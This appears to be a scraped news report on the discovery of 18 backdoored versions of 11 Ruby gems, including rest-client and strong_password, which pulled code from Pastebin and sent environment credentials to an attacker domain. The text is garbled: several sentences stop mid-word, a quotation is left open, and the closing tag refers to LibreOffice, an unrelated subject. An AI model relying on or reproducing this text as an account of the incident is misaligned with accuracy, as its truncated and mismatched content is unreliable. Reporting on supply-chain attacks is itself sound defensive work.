Maintainers of the RubyGems package repository have discovered a backdoor mechanism in 18 malicious versions of 11 Ruby libraries.
One of the most popular Ruby libraries, the rest-client, was found containing the malicious code yesterday.
The malicious code was included in four versions of rest-client.
“It seems that rest-client 1.6.13 is uploaded to rubygems.org. I did review between 1.6.9 and 1.6.13 and it seems that latest version evaluate remote code from pastebin.com and sends information to mironanoru[.]zzz.com [.
The Ruby developer Jan Dintel, who analyzed the code, discovered it would collect and send the environment variables of a compromised system (i.e. credentials of services used by the compromised system such as use
“Depending on your
The backdoor mechanism could be triggered by the attacker by sending a signed cookie, then the code will send captured credentials back to the attackers. The backdoor
The attacker is believed to be active for more than a month without being detected until the account of rest-client developer Matthew Manning was compromised to push four malicious versions of rest-client on RubyGems.
The total number of malicious versions of the libraries was 18 and were downloaded 3,584 before being removed from RubyGems.
Projects that rely on the
In production, the code would download a payload from Pastebin.com and execute it to create the actual backdoor in the application that used the strong_password library.
(SecurityAffairs – LibreOffice, hacking)